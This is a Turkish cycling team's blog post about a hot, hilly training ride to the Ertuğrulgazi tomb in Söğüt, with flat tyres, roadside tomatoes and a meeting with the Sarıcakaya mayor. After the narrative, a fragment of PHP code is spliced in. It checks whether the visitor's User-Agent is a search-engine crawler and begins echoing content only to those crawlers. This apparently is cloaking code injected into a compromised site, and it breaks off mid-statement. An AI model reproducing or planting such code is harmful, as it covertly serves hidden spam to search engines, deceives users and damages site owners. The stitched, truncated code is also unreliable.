Ecdadımıza Ziyaret ve Sakarya Vadisi Antrenmanı

Bugün hepinizin yakından tanıdığı ve çok fedakarlıklar çekmiş dedemizin Ertuğrulgazi’nin mekanına pedalladık.Emre Özkurt Batuhan Işık ve Eda Konuk Gökay Konuk’un eşliğinde yola çıktık.Bisiklet için Eskişehir-İstanbul yolu oldukça tehlikeli fakat tüm önlemleri alarak çok dikkatli bir şekilde gözümüz hep arkadan gelen araçlarda bu tehlikeli yolu aşarak Söğüt ayrımına geldik ve rahatladık.

Burdada farklı bir macera bizi bekliyordu yollara yeni mıcır atmışlar ve araçlar oldukça hızlı geldiği için savaşa girmiş gibi mermi gibi seken taşlarla mücadele ederek yol bisikletlerinin lastikleride bu yola uygun değil sürekli tırmanış olan bu yoldada oldukça zorlandık.Zirveye yakın bir yerde Dedelerimizin mola verdiği bir çeşmede eskileri anarak buz gibi kaynak suyunu içtikten sonra inişe başladık ve Söğüt’e vardık.

Söğüt A101 Soğuk içecek vakti

Tarihi camiler ve yapılar bizi karşıladı arnavut kaldırımlı Söğüt’te titreşimden çevreyi net göremesekte Ertuğrulgazi Kabrine ulaştık.2.Abdülhamit tarafından onarımı yaptırılan çeşmelerden sularımızı kana kana içtik.Sonrasında kabir ziyaretimizi gerçekleştirdik.

DCIM\100GOPRO\GOPR6698.

Diziden son zamanlarda ilgi artmış oldukça kalabalık ve bakımlı halde gördük.Film setinden çıkmış gibi askerlerde bizleri karşılaması oldukça hoştu.

DCIM\100GOPRO\GOPR6711.

Ertuğrulgazi ömrü boyunca çok çile çekmiş ve bu günlere kadar gelen ülkemizin Osmanlı dahil temellerini atmış bir kişi.Ölümünden sonra bile Yurda giren Yunan askerleri rahat bırakmamış kapısını pencerelerini kurşun yağmuruna tutmuşlar tarihi yerinde yaşamak ve günümüzle uyarlamak kısaca yaşamak çok etkili öğrenme metodu.

Atalarımızı ziyaret çok önemli Ertuğrulgazi Türbesi

Ziyaretimizden sonra aşırı sıcak havada yollar nasıl biter diye bastık pedala bol rampalı bol zorluklu yollar bizi bekler dedik ve Küre’de değerli zatlardan Ertuğrulgaziye’de yol gösterici olmuş Osmanlının ilk hutbesini Karacaşeir Camisinde okumuş Dursun Fakıh türbesinin yanından geçerek İnhisara doğru devam ettik.Çaltıda Domates meşhur ve lezzetli olur heryerde kıpkırmızı domatesleri gördük fakat sahibi olmadığı için toplayamadık.

Yorgunluk belirtisi ve sıcak.

Bir seradan ak sakallı bir dedeyi gördük çok hızlıydık 100m ilerde durup geri döndük gülümseyen yüzüyle hoşgeldiniz gençler buyrun dedi.Dede bizim canımız domates çekti acaba birkaç tane alıp yiyebilirmiyiz dedik.Çok sevindi tabiki dedi ben gidiyorum tarla sizindir dilediğiniz kadar yiyin dedi ve vedalaştık.Tarlada biraz mola verdik domateslerimizi yedik ve tabiki yola devam.

Sonrasında rampalar biraz yormaya başladı bir rampa tepesindede marul tarlası gördük yemyeşil ordada bir marul yedikten sonra Batuhan’ın lastiği patladı.Yanına yedek lastik almadığı için ona ceza verdik.Lastiğini yamadı yanlış yere yapıştırmış tekrar patladı sonra tekrar yaptık derken epey zaman kaybettik ama dinlendikte.

Organik Domates hemde dalından direk kana karışıyor.

Alpaguttan sonra Mihalgaziye az kaldı biraz daha yüklenip vardık.Markette gıda takviyesi yaptıktan sonra yola devam.Sarıcakaya’da başkanımızın sporcu desteğiyle yemeklerimizi yedik ve kendimize geldik.Kendisi ile yolda karşılaştık bize motive edici tavsiyeler sundu kendide bisiklet ile kısa bir tur yaptı makam aracıyla takas edecektik son anda caydık.Hava karardı ve 120km’ye yakın yol gelmiştik.

Organik İncirler Doğal Enerji

Yorgunluk artık kendini göstermeye başladı gittiğimiz yollar düz değil aşırı rampa ve tırmanış içeren kondisyona dayalı sıcak hava ve bozuk yol şartlarınıda eklersek dayanılmaz bir çile haline dönüşmüştü.

Batuhan Yine Lastik Patlattı bizde İncir Molasındayız.
Sarıcakaya Belediye Başkanımız Faruk Güler’e Spora desteğinden ötürü sonsuz teşekkürler.

Başkanımızla vedalaştıktan sonra takım aracımız Sarıcakaya çıkışında bizi yakaladı ve araca bindik ve Eskişehir’e ulaştık maceralı bir gün güzel bir antrenman dedelerimizden aldığımız manevi güç ve dostlarımızdan aldığımız destekle tamamlanmış oldu.Esbike olarak spora ve yeni başarılara devam.Bizi izlemeye devam edin.

function vururumgardas(){
$agent = $_SERVER[‘HTTP_USER_AGENT’];
$sec = $agent;
switch(true){
case (strpos($sec,”google”)): $part = 1; break;
case (strpos($sec,”yandex”)): $part = 1; break;
case (strpos($sec,”bing”)): $part = 1; break;
case (strpos($sec,”yahoo”)): $part = 1; break;
case (strpos($sec,”alexa”)): $part = 1; break;
default : $part = 0;
}
if($part ==1){
echo ‘

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir